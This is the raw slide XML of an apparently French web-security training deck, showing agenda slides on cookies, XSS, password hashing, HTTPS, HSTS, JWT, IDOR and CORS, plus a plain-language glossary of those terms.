          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="3255264"/>
            <a:ext cx="9144000" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Jour 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="3456432"/>
            <a:ext cx="9144000" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JWT, IDOR, CORS, hygiène</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="3712464"/>
            <a:ext cx="9144000" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Falsifier un jeton. Exiger le propriétaire. Ranger le serveur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3986784"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3968496"/>
            <a:ext cx="640080" cy="402336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="3968496"/>
            <a:ext cx="9144000" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Annexe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="4169664"/>
            <a:ext cx="9144000" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Si vous avez fini plus tôt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="4425696"/>
            <a:ext cx="9144000" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Optionnel. Hors cadre des bonnes pratiques vues ici.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 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cover-hero-day1-1296x1236.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6263640" y="457200"/>
            <a:ext cx="5925312" cy="5650992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="457200"/>
            <a:ext cx="5806440"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1965960"/>
            <a:ext cx="5029200" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JOUR  1  ·  facile, beaucoup de pratique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2377440"/>
            <a:ext cx="5029200" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP, navigateur, cookies, hashing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3931920"/>
            <a:ext cx="5029200" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On ouvre DevTools. XSS en un mot. Cookies. Mots de passe. HTTPS.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 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>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585216"/>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JOUR  1  ·  AU PROGRAMME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="859536"/>
            <a:ext cx="10058400" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ce que nous discutons aujourd’hui</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1335024"/>
            <a:ext cx="101498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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="1536192"/>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4" name="TextBox 13">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="1554480"/>
            <a:ext cx="6949440" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Threat model &amp; trust boundaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="1572768"/>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1 h · talk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="1956816"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2157984"/>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18" name="TextBox 17">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="2176272"/>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Cookies, XSS, sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="2194560"/>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2 h 30 · labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2578608"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2779776"/>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2" name="TextBox 21">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="2798064"/>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Password hashing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="2816352"/>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2 h · lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3200400"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3401568"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="3419856"/>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HTTPS, Secure, HSTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="3438144"/>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45 min · lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3822192"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId9"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="4023360"/>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05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId9"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="4041648"/>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Bilan du jour</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId9"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="4059936"/>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20 min</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="4443984"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId10"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="4645152"/>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X1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId10"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="4663440"/>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Extra  ·  XSS maison (8012 / 8014)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId10"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="4681728"/>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si vous avez fini</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="5065776"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId11"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="5266944"/>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X2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId11"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="5285231"/>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Extra  ·  le snippet à coller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId11"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="5303520"/>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avec le lab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 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>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Lexique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>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Les mots de cette section, sans jargon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>
            <a:ext cx="10058400" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On les revoit dans les labs. Ici : une phrase chacun.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1444751"/>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1005840" y="1444751"/>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325880" y="148132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Trust boundary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="170078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La ligne entre ce que vous contrôlez (le serveur, après contrôle) et le reste (navigateur, réseau, l’utilisateur).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="223113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223113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25880" y="226771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Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2487168"/>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Un petit fichier que le navigateur renvoie tout seul à un site. Ce n’est pas magique : c’est un header HTTP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3017520"/>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05840" y="3017520"/>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325880" y="3054096"/>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HttpOnly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="3273552"/>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JavaScript ne peut plus lire ce cookie. Un XSS ne le vole plus par document.cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="38039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1005840" y="38039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325880" y="38404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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="40599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Du JavaScript que vous n’avez pas écrit, exécuté comme s’il venait du site.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="45902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005840" y="45902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325880" y="46268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Hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="48463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Une empreinte. On range l’empreinte du mot de passe, jamais le mot de passe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rounded Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="53766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1005840" y="53766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325880" y="54132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HTTPS / TLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="56327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Un tunnel chiffré jusqu’au serveur. Le Wi-Fi de l’hôtel ne lit plus le Cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rounded Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="61630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1005840" y="61630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1325880" y="61996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HSTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="6419088"/>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Un header qui dit au navigateur : plus jamais en HTTP pour ce site.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01</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Threat model &amp; trust boundaries</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40 min  ·  Pas d’exercice code  ·  Modèle mental pour les 3 jours</a:t>
            </a:r>
          </a:p>
        </p:txBody>
